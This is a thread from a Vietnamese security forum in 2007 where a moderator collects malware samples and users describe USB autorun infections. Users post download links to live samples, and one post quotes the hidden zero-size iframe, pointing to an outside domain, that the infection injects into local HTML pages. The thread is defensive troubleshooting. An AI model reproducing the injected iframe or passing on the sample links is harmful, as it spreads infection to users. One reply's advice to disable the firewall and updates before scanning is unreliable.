English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thảo luận virus, trojan, spyware, worm... Nhận mẫu virus  XML
Go to Page:  2 3 4 Page 5 Last Page
  [Question]   Nhận mẫu virus 19/04/2007 12:00:10 (+0700) | #1 | 54589
LeVuHoang
HVA Friend
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
[Profile] [PM]
hello,
Hiện nay Hoàng đang cần 1 số mẫu trojan, virus, worm...
Nếu máy bạn bị nhiễm mà không diệt được, vui lòng upload mẫu malware lên 1 nơi nào đó để Hoàng có thể download.
Trong khả năng có giới hạn (Hoàng hiện nay cũng đang rất busy), Hoàng sẽ có thể hướng dẫn cho bạn cách diệt bằng tay loại malware đó.

Các bước để mẫu của bạn được tiếp nhận như sau:
1. Xài chương trình Anti Virus quét trước tập tin đó. Có thể là AVG www.grisoft.com), NOD32 www.nod32.com)... hoặc ngay cả BKAV www.bkav.com.vn)
2. Nếu vẫn không diệt được, bạn vui lòng upload lên 1 free host nào đó. Ví dụ:
http://freefileupload.net/
3. Hoàng sẽ down về và hướng dẫn cách diệt (không hứa smilie ).

Thanks all.

conmale: Đính lên.
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 21/04/2007 01:18:16 (+0700) | #2 | 54856
[Avatar]
 user29808
Member
[Minus]    0    [Plus]
Joined: 15/04/2007 11:49:39
Messages: 4
Offline
[Profile] [PM] [Email] [Yahoo!]
mail của anh là gì?
[Locked] [Up] [Print Copy]
  [Question]   Re: Nhận mẫu virus 21/04/2007 05:20:22 (+0700) | #3 | 54901
[Avatar]
 xuandien
Member
[Minus]    0    [Plus]
Joined: 30/08/2005 08:52:24
Messages: 30
Location: www.xuandien.tk
Offline
[Profile] [PM] [Email] [WWW] [Yahoo!]
Có ai diệt hộ con này nha ! http://www.freewebtown.com/xuandien_vp/virus.rar

Chú ý :
Khi giải nén ra mà nối mạng thì các trang web file.htm lưu trong máy của bạn sẽ bị nhiễm hết đoạn code sau vào cuối trang
<iframe src="http://www.68aa.cn/mu/index.htm" width="0" height="0" frameborder="0"></iframe>

Thật là phiền toái cho tôi khi gặp phải loại này !


[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 22/04/2007 12:10:49 (+0700) | #4 | 55142
LeVuHoang
HVA Friend
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
[Profile] [PM]
@user29808: Bạn có thể upload lên các free hosting ở trên để Hoàng down xuống
@xuandien: Hoàng đã test với AVG và NOD32, cả 2 đều nhận dạng ra loại này. Bạn vui lòng đọc kỹ nội dung trước khi yêu cầu test bên trên.
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 24/04/2007 01:32:07 (+0700) | #5 | 55377
[Avatar]
 user29808
Member
[Minus]    0    [Plus]
Joined: 15/04/2007 11:49:39
Messages: 4
Offline
[Profile] [PM] [Email] [Yahoo!]
nhưmg khổ nỗi con virus nhà em ko biết nó trốn ở đâu chỉ thấy nó khóa các chức năng của usb ko format;copy;delete gì sất;chọn các chức năng trong folder option mà ko thấy nó trong usb;khi cắm usb khác vào máy trên thì thấy trong usb mới có 2 file autorun.inf và thumb.db song lại ko bị như cái usb trước ;quét =avg 6.0 thì nó chỉ phát hiện thay đổi trong regetry nhưng ko diệt được à quên bật task manager thấy có chương trình spool.exe chạy khi khởi động em hơi nghi vì trước kia ko có cái này.Mong được gúp đỡ vì tui gà IT lắm
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 24/04/2007 01:58:34 (+0700) | #6 | 55379
LeVuHoang
HVA Friend
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
[Profile] [PM]

cắm usb khác vào máy trên thì thấy trong usb mới có 2 file autorun.inf và thumb.db
 

Vậy là máy bạn bị nhiễm virus lây qua USB rồi smilie. thường thì nó sẽ tạo ra 2 file Autorun.inf và 1 file .exe ẩn.
Bạn mở file Autorun.inf ra sẽ thấy trong đó chứa một tên file .exe smilie
Để xem các tập tin ẩn, trong Windows Explorer, chọn Tools > Options > View > Show hidden files.
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 26/04/2007 02:22:53 (+0700) | #7 | 55764
MTDng
Member
[Minus]    0    [Plus]
Joined: 25/04/2007 15:14:44
Messages: 5
Offline
[Profile] [PM]
USB tôi bị dính con virus hay worm gì đó lạ lắm. Thấy tên file là "USB(*&((".Bao nhiêu dữ liệu trong USB đều bị nó ăn hết. Không copy được nên kô biết gởi mẫu bằng cách nào nữa. Đã thử quét bằng BKAV và BitDefender đều kô nhận ra. Quét bằng 1 số chương trình khác thì nó tạo ra forder con liên tục-----> quét ko bao h xong lun.
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 26/04/2007 13:45:36 (+0700) | #8 | 55859
LeVuHoang
HVA Friend
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
[Profile] [PM]
Bạn thử dùng AVG Anti Virus xem, nhớ sau khi cài xong thì cập nhật cơ sở dữ liệu virus mới nhất từ máy chủa của AVG. Nếu vẫn còn bị nữa thì quay lại đây cùng Hoàng tìm cách giải quyết smilie
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 27/04/2007 11:06:20 (+0700) | #9 | 56010
[Avatar]
 tmd
Member
[Minus]    0    [Plus]
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
[Profile] [PM]
Sử dụng Volkov commander trên đĩa LHT , USB vẫn nhận được nếu sử dụng cái này, chép file .exe ẩn trên USB sang chổ nào đó ,vào lại windows, nén lại rồi upload cho mod. Mẫu worm hay trojan hiện nay dễ tìm lắm. Lên cơ quan cắm vào là có, hoặc ra tiệm nét, hoặc down bậy ba lung tung là thấy. Sử dụng volkov để xóa file ẩn của worm/trojan tốt.
PS: Nên nén .inf và file .exe rồi gửi cho mod.
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 30/04/2007 03:03:17 (+0700) | #10 | 56359
nightmares3000
Member
[Minus]    0    [Plus]
Joined: 18/08/2005 02:16:47
Messages: 3
Offline
[Profile] [PM]
máy em mới dính 1 con virut lạ
dùng gì cũng ko quét ra

triệu chứng như sau
nó làm disable chức năng hiện những file ẩn
nó tự động lây nhiễm mà ko cần run bất cứ file gì ( em cắm USB vào, tháo ra, sang 1 máy sạch mới cài win thì ko tài nào có thể cho hiện file ẩn lên)
còn nữa
khi vào USB, nó tự động tạo file autoplay
nên khi muốn vào ổ đó, phải chọn open thay cho click chuột
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 30/04/2007 03:59:08 (+0700) | #11 | 56361
LeVuHoang
HVA Friend
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
[Profile] [PM]

dùng gì cũng ko quét ra
 

bạn nói chung chung quá, bạn đã thử quét virus với 2 chương trình trên chưa (bạn phải cập nhật dữ liệu về virus của các chương trình trên thông qua mạng internet).
Bạn hãy theo cách của tmd hướng dẫn bên trên mà gởi mẫu virus lên HVA nhé!
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 01/05/2007 09:13:40 (+0700) | #12 | 56561
[Avatar]
 user29808
Member
[Minus]    0    [Plus]
Joined: 15/04/2007 11:49:39
Messages: 4
Offline
[Profile] [PM] [Email] [Yahoo!]
em đã tìm ra nó nhưng ko sao xóa được file đó
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 01/05/2007 14:11:02 (+0700) | #13 | 56594
LeVuHoang
HVA Friend
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
[Profile] [PM]
Tại vì file đó đang được thực thi trên bộ nhớ nên không thể xoá được. Bạn vào www.sysinternals.com, kiếm chương trình Process Explorer về mà kill file đó khỏi bộ nhớ trước khi xoá.
[Locked] [Up] [Print Copy]
  [Question]   Re: Nhận mẫu virus 02/05/2007 06:07:12 (+0700) | #14 | 56696
longname
Member
[Minus]    0    [Plus]
Joined: 26/04/2007 14:55:42
Messages: 34
Offline
[Profile] [PM]
Để xem các tập tin ẩn, trong Windows Explorer, chọn Tools > Options > View > Show hidden files.
 

nếu mà mở được cái nay thi đã tốt con VR của em nó khóa hết luôn
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 02/05/2007 06:10:00 (+0700) | #15 | 56699
longname
Member
[Minus]    0    [Plus]
Joined: 26/04/2007 14:55:42
Messages: 34
Offline
[Profile] [PM]
Loại VR của em là BKV nó quét xong rồi BKV đi theo no luôn.Tưởng BKV nó đi roài là giết được con này ai ngờ nó vẫn sống trơ ra
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 02/05/2007 12:10:51 (+0700) | #16 | 56746
LeVuHoang
HVA Friend
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
[Profile] [PM]
Bạn dùng chương trình như tmd đã nêu ở trên để tìm file ẩn.
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 02/05/2007 22:49:38 (+0700) | #17 | 56785
[Avatar]
 tcuong
Member
[Minus]    0    [Plus]
Joined: 19/03/2005 14:38:46
Messages: 63
Offline
[Profile] [PM]

longname wrote:
Loại VR của em là BKV nó quét xong rồi BKV đi theo no luôn.Tưởng BKV nó đi roài là giết được con này ai ngờ nó vẫn sống trơ ra 

Bạn phải tắt 3 chức năng: Automatic update, firewall, System Restore đi, sau đó mới quét là ok, mình đã diệt được với Bkav.
Chúc thành công!
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 04/05/2007 01:47:07 (+0700) | #18 | 56966
[Avatar]
 user29808
Member
[Minus]    0    [Plus]
Joined: 15/04/2007 11:49:39
Messages: 4
Offline
[Profile] [PM] [Email] [Yahoo!]
em mệt với con virus này lắm roài muốn cài lại win dc ko ,liệu có bị mắc lại dc ko
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 04/05/2007 12:58:05 (+0700) | #19 | 57053
LeVuHoang
HVA Friend
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
[Profile] [PM]
Có nhiều đường để có thể bị lây nhiễm virus, câu hỏi của bạn rất chung chung. Chỉ có thể không bị nhiễm lại khi mọi nguồn đều sạch, có chương trình chống virus được cập nhật thường xuyên
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 07/05/2007 23:37:46 (+0700) | #20 | 57642
MTDng
Member
[Minus]    0    [Plus]
Joined: 25/04/2007 15:14:44
Messages: 5
Offline
[Profile] [PM]
</blockquote>
USB tôi bị dính con virus hay worm gì đó lạ lắm. Thấy tên file là "USB(*&((".Bao nhiêu dữ liệu trong USB đều bị nó ăn hết. Không copy được nên kô biết gởi mẫu bằng cách nào nữa. Đã thử quét bằng BKAV và BitDefender đều kô nhận ra. Quét bằng 1 số chương trình khác thì nó tạo ra forder con liên tục-----> quét ko bao h xong lun.
</blockquote>

Túm được nó rồi. Nó ăn vào file .rar này rồi. Mở bằng notepad lên thấy nó "USBSH^È… ‹ÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿB i d e f  ‹e n d e r v 1 BIDEFE~1  ½¼B¤6¦6 ½B¤6 åU S B B  ro o t ÿÿÿÿ ÿÿÿÿåSBBOO~1  úB¤6¤6 ûB¤6ø  AVG RAR zC¤6¦6 6¦£6^$ÂieBd o w n .  ºc o m . r a r H B C D 9  º. 0 - w w w . 9 HBCD90~1RAR l]š¥6¦6 ™¥6µJÚ,€VTP6 ZIP {Œš¥6§6 Ü‘¥6¸’ñºãBz i p ÿÿ rÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿR o y a l  re _ t h e m e . ROYALE~1ZIP ·š¥6§6 $¥6ô°VÎ AN e w F  Ýo l d e r ÿÿÿÿNEWFOL~1  »Ì^¦6¦6 Í^¦6 B) ÿÿÿÿÿÿ ýÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿN e w F  ýo l d e r ( 2 NEWFOL~2  eb‰¦6¦6 c‰¦6 AH a n a m  Ji . z i p ÿÿÿÿHANAMI ZIP U1R§6§6 ‰f›6 Áu "
tùm lum hết.
Tôi đã up lên đây rồi nè.
http://rapidshare.com/files/29912928/Hanami.zip
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 08/05/2007 05:50:28 (+0700) | #21 | 57717
LeVuHoang
HVA Friend
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
[Profile] [PM]
Tôi đã tải file Hanami.zip của bạn về nhưng không unzip được smilie
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 09/05/2007 07:36:38 (+0700) | #22 | 57939
MTDng
Member
[Minus]    0    [Plus]
Joined: 25/04/2007 15:14:44
Messages: 5
Offline
[Profile] [PM]
Ặc. Thì con virus nó ăn vào file đó rồi. Mở bằng notepad là thấy.
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 09/05/2007 12:10:30 (+0700) | #23 | 57983
LeVuHoang
HVA Friend
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
[Profile] [PM]
Trong hiểu biết của Hoàng thì chưa nghe nói có loại virus nào inject vào file .zip bao giờ cả smilie
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 09/05/2007 21:33:39 (+0700) | #24 | 58024
MTDng
Member
[Minus]    0    [Plus]
Joined: 25/04/2007 15:14:44
Messages: 5
Offline
[Profile] [PM]
Không chỉ file .zip không đâu. File nào nó cũng inject vào cả. Dữ liệu copy vào USB đều bị hư hết. Cái USB của tôi là loại MP4 (bà già đi Lao Bảo mua). Mà cái con này chỉ phá cái USB của tôi thôi. Loại USB thường của mấy đứa bạn cũng gắm vào máy mà kô thấy bị gì. Nếu muốn có file .exe, .txt,... thì tôi cũng có thể up lên cho xem.
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 10/05/2007 06:13:19 (+0700) | #25 | 58116
LeVuHoang
HVA Friend
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
[Profile] [PM]
Bạn phải đi từng bước để xác định xem, đâu là tập tin bình thường, đâu là virus.
1. Đầu tiên, bạn có thấy tập tin autorun.inf trong USB của mình không ?
2. Tiếp theo, bạn mở file autorun.inf ra xem trong đó có dòng nào trỏ đến tập tin .exe không
3. Nếu có, bạn dùng công cụ của tmd nêu trên, copy file đó và upload lên đây cho Hoàng.
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 10/05/2007 08:17:01 (+0700) | #26 | 58141
[Avatar]
 tmd
Member
[Minus]    0    [Plus]
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
[Profile] [PM]
Tặng cho mod một mẩu con gì đó , bkav mới nhất cũng chưa có update con này.
http://www.freefileupload.net/file.php?file=files/090507/1178712553/BENH+VIEN+TRIEU+AN1_files.rar

tui tắt autorun , nên mấy ẻm này ko làm gì được cái PC, lấy mẫu rất dễ. Rất tiếc là cái gốc ngoài USB bị hư, chỉ còn phiên bản của nó trong các thư mục bị nhiễm. file lên tới 1.7Mb
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Locked] [Up] [Print Copy]
  [Question]   Re: Nhận mẫu virus 10/05/2007 10:56:56 (+0700) | #27 | 58168
rememberxx811
Member
[Minus]    0    [Plus]
Joined: 16/07/2006 22:53:56
Messages: 2
Location: Phú Thọ
Offline
[Profile] [PM] [Email] [Yahoo!]
Hoàng a! Máy tôi bị nhiễm con virus tự đông ngắt máy. Bạn biết đó là virus gì không? Và phải dùng phần mềm nào để diệt. Cảm ơn trước nhé.
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 11/05/2007 11:44:52 (+0700) | #28 | 58412
LeVuHoang
HVA Friend
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
[Profile] [PM]
Câu hỏi của bạn chung chung quá. Hoàng chỉ có thể khuyên bạn cài 2 chương trình chống virus ở trên và cập nhật dữ liệu virus mới nhất từ internet thôi.
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 11/05/2007 11:48:08 (+0700) | #29 | 58414
LeVuHoang
HVA Friend
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
[Profile] [PM]
@tmd: Hoàng tải file của bạn về, giải nén ra được 1 file .exe nhưng không thực thi được ?
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 11/05/2007 12:00:46 (+0700) | #30 | 58416
[Avatar]
 tmd
Member
[Minus]    0    [Plus]
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
[Profile] [PM]
tui cũng thử nó, cũng ra một cửa sổ kiểu cmd , cũng không thấy hiện tượng gì lạ xảy ra. Nên mới gởi cho mod xem thử có tool nào kiểm tra. Khả năng là con gì đó nó chưa hoàn thiện cho lắm.
Up lại cho mod một file fooool.zip . Con này đã được udpate rồi. Con này là file chính , nằm ngoài thư mục gốc của usb.

http://www.freefileupload.net/file.php?file=files/100507/1178812662/fooool.rar

PS : có thể con này cũng không action gì được. Tui thử mà nó cứ im ỉm(chạy file gốc). Phải giữ nguyên tình trạng inf + file nguồn, cắm USB vào một máy pc mới cài win để kiểm tra.
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Locked] [Up] [Print Copy]
Go to Page:  2 3 4 Page 5 Last Page
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|